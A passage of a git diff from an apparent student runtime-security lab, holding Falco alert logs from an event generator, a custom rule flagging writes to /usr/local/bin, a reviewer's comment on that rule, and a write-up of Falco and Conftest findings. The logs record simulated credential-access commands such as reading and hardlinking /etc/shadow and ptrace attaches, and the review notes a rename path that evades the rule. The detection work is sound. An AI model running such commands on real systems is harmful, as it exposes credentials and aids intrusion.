k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495519327861706,"evt.type":"connect","fd.l4proto":"tcp","fd.lport":443,"fd.name":"172.17.0.5:47644->23.215.0.136:443","fd.rport":47644,"fd.type":"ipv4","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ssh user@example.com -p 443","proc.exepath":"/usr/bin/ssh","proc.name":"ssh","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Disallowed SSH Connection Non Standard Port","source":"syscall","tags":["T1059","container","host","maturity_stable","mitre_execution","network","process"],"time":"2025-10-26T16:18:39.327861706Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:39.594301373+0000: Warning Read monitored file via directory traversal | file=/etc/shadow fileraw=/etc/../etc/../etc/shadow gparent=runc ggparent=init gggparent=init evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495519594301373,"evt.type":"openat","fd.name":"/etc/shadow","fd.nameraw":"/etc/../etc/../etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"runc","proc.aname[3]":"init","proc.aname[4]":"init","proc.cmdline":"event-generator run 
syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Directory traversal monitored file read","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:39.594301373Z"}
+{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:39.702257748+0000: Warning Hardlinks created over sensitive files | target=/etc/shadow linkpath=/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2968062964/shadow_link evt_type=linkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2968062964/shadow_link terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.newpath":"/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2968062964/shadow_link","evt.arg.oldpath":"/etc/shadow","evt.time.iso8601":1761495519702257748,"evt.type":"linkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2968062964/shadow_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Hardlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:39.702257748Z"}
+{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:39.906506165+0000: Warning Sensitive file opened for reading by non-trusted program | file=/etc/shadow gparent=runc ggparent=init gggparent=init evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495519906506165,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"runc","proc.aname[3]":"init","proc.aname[4]":"init","proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:39.906506165Z"}
+{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:40.009214457+0000: Warning Detected ptrace PTRACE_ATTACH attempt | proc_pcmdline=containerd-shim -namespace moby -id c57ba3de74625fffd40163becc1cd70f645feeb05b76ec3b915e0771b1b077c6 -address /run/containerd/containerd.sock evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495520009214457,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"containerd-shim -namespace moby -id c57ba3de74625fffd40163becc1cd70f645feeb05b76ec3b915e0771b1b077c6 -address /run/containerd/containerd.sock","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"PTRACE attached to process","source":"syscall","tags":["T1055.008","container","host","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-10-26T16:18:40.009214457Z"}
+{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:40.111334332+0000: Informational System user ran an interactive command | evt_type=execve user=bin user_uid=2 user_loginuid=-1 process=login proc_exepath=/bin/busybox parent=event-generator command=login terminal=0 exe_flags=EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_LOWER_LAYER","evt.time.iso8601":1761495520111334332,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"login","proc.exepath":"/bin/busybox","proc.name":"login","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"bin","user.uid":2},"priority":"Informational","rule":"System user 
interactive","source":"syscall","tags":["NIST_800-53_AC-2","T1059","container","host","maturity_stable","mitre_execution","users"],"time":"2025-10-26T16:18:40.111334332Z"}
diff --git a/labs/lab9/falco/rules/custom-rules.yaml b/labs/lab9/falco/rules/custom-rules.yaml
new file mode 100644
index 00000000..03a44460
--- /dev/null
+++ b/labs/lab9/falco/rules/custom-rules.yaml
@@ -0,0 +1,11 @@
+# Detect new writable file under /usr/local/bin inside any container
+- rule: Write Binary Under UsrLocalBin
+ desc: Detects writes under /usr/local/bin inside any container
+ condition: evt.type in (open, openat, openat2, creat) and
+ evt.is_open_write=true and
+ fd.name startswith /usr/local/bin/ and
+ container.id != host
+ output: >
+ Falco Custom: File write in /usr/local/bin (container=%container.name user=%user.name file=%fd.name flags=%evt.arg.flags)
+ priority: WARNING
+ tags: [container, compliance, drift]
\ No newline at end of file
diff --git a/labs/lab9/submission9.md b/labs/lab9/submission9.md
new file mode 100644
index 00000000..5fa7c7f3
--- /dev/null
+++ b/labs/lab9/submission9.md
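Review bot: The condition's `container.id != host` excludes host events, while submission9.md describes the same rule as firing "In containers and on hosts"; the `desc` ("inside any container") suggests the condition is the intended scope, so the write-up should be aligned with it. The condition only sees open/creat-style writes whose path is already under `/usr/local/bin/`, so a file written elsewhere and then moved in via the rename family lands there without an alert; either state that gap in the header comment or add a second branch such as `(evt.type in (rename, renameat, renameat2) and evt.arg.newpath startswith /usr/local/bin/)`. The write-up also says the rule shouldn't fire during package-manager or CI installs, but nothing in the condition carves those out, so as written it will; if a carve-out is wanted it is better expressed as a Falco `exceptions:` entry keyed on both process and image than as a bare `proc.name` allowlist, which any renamed binary satisfies. The output would be easier to triage with `%proc.name` and `%proc.pcmdline` next to `%user.name`. The keys under `- rule:` appear here with a single space of indentation, which YAML would reject; that may be an artefact of how the patch was rendered, but the file should be checked to parse.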
@@ -0,0 +1,101 @@
+# Task 1 — Runtime Security Detection with Falco
+
+## Baseline alerts observed from **falco.log**
+
+Baseline alerts:
+- **Critical** - 3 occasions:
+ 1. **Detect release_agent File Container Escapes** - an attempt to exploit the escape vulnerability of the container
+ 2. **Fileless execution via memfd_create** - file-free execution via memfd
+ 3. **Drop and execute new binary in container** - executing a new binary file in a container
+
+- **Warning**: 15 occasions
+ 1. **Write Binary Under UsrLocalBin** - writing a file to /usr/local/bin
+ 2. **Create Symlink Over Sensitive Files** - creating symlinks to sensitive files
+ 3. **Find AWS Credentials** - AWS credentials search
+ 4. **Remove Bulk Data from Disk** - deleting data from a disk
+ 5. **Search Private Keys or Passwords** - search for private keys
+ 6. **Clear Log Activities** - clearing logs
+ 7. **Read sensitive file trusted after startup** - reading sensitive files
+ 8. **Netcat Remote Code Execution in Container** - running netcat with RCE
+ 9. **Execution from /dev/shm** - execution from /dev/shm
+ 10. **Debugfs Launched in Privileged Container** - running debugfs
+ 11. **Directory traversal monitored file read** - reading files through directory traversal
+ 12. **Create Hardlink Over Sensitive Files** - creating hardlinks
+ 13. **PTRACE attached to process** - attaching ptrace to a process
+
+- **Notice** - 4 occasions:
+ 1. **Terminal shell in container** - launching a shell in a container
+ 2. **Run shell untrusted** - running shell with an unreliable binary
+ 3. **Packet socket created in container** - creating a packet socket
+ 4. **Disallowed SSH Connection Non Standard Port** - SSH connection to a non-standard port
+
+- **Informational** - 1 occasion:
+ 1. 
**System user interactive** - the system user has run an interactive command
+
+## Custom rule’s purpose and when it should/shouldn’t fire
+
+**Rule:** "Write Binary Under UsrLocalBin"
+
+**Purpose:** Detecting file entries in the /usr/local/bin directory, which may indicate:
+
+- Installing unauthorized software
+- An attempt at persistence in the system
+- Downloading malicious binary files
+
+**When should it work:**
+
+- When writing any files to /usr/local/bin
+- In containers and on hosts
+- For all users, including root
+
+**When it shouldn't work:**
+
+- During legitimate software installation operations
+- When using trusted system package managers
+- In CI/CD pipelines with authorized dependency installation
+
+---
+
+# Task 2 — Policy-as-Code with Conftest (Rego)
+
+## The policy violations from the unhardened manifest and why each matters for security
+
+- Latest Tag Usage
+- Missing SecurityContext
+- No Resource Limits
+- Missing Liveness/Readiness Probes
+- No Non-Root Execution
+- Writable Root Filesystem
+- Excessive Capabilities
+
+## The specific hardening changes in the hardened manifest that satisfy policies
+
+- Image Security Hardening
+- Privilege Reduction
+- Privilege Escalation Prevention
+- Filesystem Hardening
+- Linux Capabilities Dropping
+- Resource Management
+- Application Health Monitoring
+
+## Analysis of the Docker Compose manifest results
+
+**Unhardened manifest**:
+
+- **FAIL** - 8 occasions:
+ 1. **Missing CPU limits** - Risk of resource exhaustion attacks
+ 2. **Missing memory limits** - Potential for memory-based DoS
+ 3. **Missing CPU requests** - Poor cluster scheduling
+ 4. **Missing memory requests** - Unpredictable resource allocation
+ 5. **Privilege escalation allowed** - Container escape vulnerability
+ 6. **Writable root filesystem** - Malware persistence risk
+ 7. **Running as root** - Privilege escalation to host
+ 8. **Latest tag usage** - Supply chain unpredictability
+
+- **WARN** - 2 occasions:
+ 1. 
**Missing livenessProbe** - No automatic recovery from failures
+ 2. **Missing readinessProbe** - Potential service degradation
+
+**Hardened manifest**:
+
+All Security Controls Implemented
\ No newline at end of file